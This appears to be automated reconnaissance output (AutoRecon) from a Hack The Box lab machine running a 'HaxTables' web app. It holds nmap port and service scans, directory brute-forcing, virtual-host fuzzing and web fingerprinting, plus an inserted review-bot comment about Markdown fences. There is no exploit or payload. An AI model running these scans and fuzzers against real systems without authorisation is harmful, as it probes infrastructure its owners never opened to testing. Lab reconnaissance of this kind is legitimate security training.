| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 25.62 ms 10.10.14.1
2 26.90 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:08:07 2023 -- 1 IP address (1 host up) scanned in 71.78 seconds
```


@@ -0,0 +1,61 @@
```bash
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_top_100_udp_nmap.txt](file:///home/kali/htb/results/scans/_top_100_udp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2
Warning: 10.129.123.2 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.123.2 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 244s
Not shown: 84 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
80/udp open|filtered http no-response
111/udp open|filtered rpcbind no-response
120/udp open|filtered cfdptkt no-response
135/udp open|filtered msrpc no-response
177/udp open|filtered xdmcp no-response
520/udp open|filtered route no-response
593/udp open|filtered http-rpc-epmap no-response
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
3703/udp open|filtered adobeserver-3 no-response
4500/udp open|filtered nat-t-ike no-response
49186/udp open|filtered unknown no-response
49190/udp open|filtered unknown no-response
49192/udp open|filtered unknown no-response
49193/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 49152/udp)
HOP RTT ADDRESS
1 25.83 ms 10.10.14.1
2 26.04 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:11:00 2023 -- 1 IP address (1 host up) scanned in 243.96 seconds
```


@@ -0,0 +1,67 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/results/scans/_quick_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-28 20:06:56 CET for 29s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (88%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T6(R=N)
T7(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 25.03 ms 10.10.14.1
2 26.51 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:25 2023 -- 1 IP address (1 host up) scanned in 29.16 seconds
```


@@ -0,0 +1,69 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.039s latency).
Scanned at 2023-01-28 20:07:26 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:28 2023 -- 1 IP address (1 host up) scanned in 2.73 seconds
```


@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.123.2:80/robots.txt
```


@@ -0,0 +1,65 @@
```bash
curl -sSik http://10.129.123.2:80/
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_curl.html):
```
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HaxTables</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="assets/css/main.css">
<script src="./assets/js/main.js"></script>
</head>
<body>
<h1 align="center">HaxTables</h1>
<br><br>
<div class="container">
<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">HaxTables</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
<li class="dropdown"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Convertions<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/index.php?page=string">String</a></li>
<li><a href="/index.php?page=integer">Integer</a></li>
<li><a href="/index.php?page=image">Images</a></li>
</ul>
</li>
<li><a href="#">About us</a></li>
<li><a href="/index.php?page=api">API</a></li>
</ul>
</div>
</nav>
<p align="center">Free online String and Number converter. Just load your input and they will automatically get converted to selected format. A collection of useful utilities for working with String and Integer values. All are simple, free and easy to use. There are no ads, popups or other garbage!</p>
<p align="center">
<img src="../assets/img/index.png">
</p>
</div>
</body>
</html>
```


@@ -0,0 +1,41 @@
```bash
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
```
403 GET 9l 28w 277c http://10.129.123.2/.htaccess
403 GET 9l 28w 277c http://10.129.123.2/.hta
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.txt
403 GET 9l 28w 277c http://10.129.123.2/.hta.txt
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.txt
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.html
403 GET 9l 28w 277c http://10.129.123.2/.hta.html
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.html
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.php
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.asp
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.asp
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.asp
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.aspx
403 GET 9l 28w 277c http://10.129.123.2/.hta.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.jsp
403 GET 9l 28w 277c http://10.129.123.2/.hta.jsp
200 GET 48l 137w 0c http://10.129.123.2/index.php
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.jsp
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
200 GET 1l 2w 0c http://10.129.123.2/handler.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
403 GET 9l 28w 277c http://10.129.123.2/server-status
```


@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
```


@@ -0,0 +1,149 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.025s latency).
Scanned at 2023-01-28 20:07:26 CET for 160s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-mobileversion-checker: No mobile version detected.
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
| https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
|_ https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-feed: Couldn't find any feeds.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-headers:
| Date: Sat, 28 Jan 2023 19:07:19 GMT
| Server: Apache/2.4.52 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 29
| Comment:
| /* The textarea itself */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 14
| Comment:
| /* Containing areas */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 41
| Comment:
| /* The status bar */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 1
| Comment:
| /* Import Google Font */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 63
| Comment:
| /* The submit button */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 4
| Comment:
|_ /* RESET */
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-errors: Couldn't find any error pages.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /assets/css/
| css: 1
| /assets/img/
| png: 1
| /assets/js/
| js: 1
| Longest directory structure:
| Depth: 2
| Dir: /assets/img/
| Total files found (by extension):
|_ Other: 1; css: 1; js: 1; php: 1; png: 1
|_http-date: Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-traceroute:
| HTML title
| Hop #1: 400 Proxy Error
| Hop #2: HaxTables
| Hop #3: HaxTables
| Status Code
| Hop #1: 400
| Hop #2: 200
| Hop #3: 200
| content-type
| Hop #1: text/html; charset=iso-8859-1
| Hop #2: text/html; charset=UTF-8
| Hop #3: text/html; charset=UTF-8
| content-length
| Hop #1: 424
| Hop #2
|_ Hop #3
|_http-title: HaxTables
|_http-malware-host: Host appears to be clean
| http-enum:
|_ /includes/: Potentially interesting folder
| http-php-version: Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-chrono: Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms
| http-vhosts:
|_128 names had status 200
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:10:06 2023 -- 1 IP address (1 host up) scanned in 160.94 seconds
```


@@ -0,0 +1,13 @@
```bash
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
``````bash
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt):
```
api
image
```
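Review bot: The closing fence of the curl block and the opening fence of the ffuf block are fused into one line of six backticks followed by `bash`, so a Markdown renderer will probably not end the first code block there and the two commands and the result listing may render as one run. If the file is stored this way rather than only displayed this way, put the closing fence on its own line and start the next block on a new line with the three-backtick `bash` opener. It would also help to add one sentence before the ffuf block saying that `-fs 1999` is presumably the response size returned for the random `Host:` baseline request, so a reader understands that `api` and `image` are listed because their response size differed from the default virtual host.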


@@ -0,0 +1,80 @@
```bash
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_whatweb.txt):
```
WhatWeb report for http://10.129.123.2:80
Status : 200 OK
Title : HaxTables
IP : 10.129.123.2
Country : RESERVED, ZZ
Summary : Apache[2.4.52], Bootstrap[3.4.1], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery[3.6.0], Script, X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.4.1
Version : 3.4.1
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.6.0
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:10 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 814
Connection: close
Content-Type: text/html; charset=UTF-8
```


@@ -0,0 +1,3 @@
```bash
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
```


@@ -0,0 +1,78 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: IwDcITnyfroNmHvjuTwI.encoding.htb" http://encoding.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
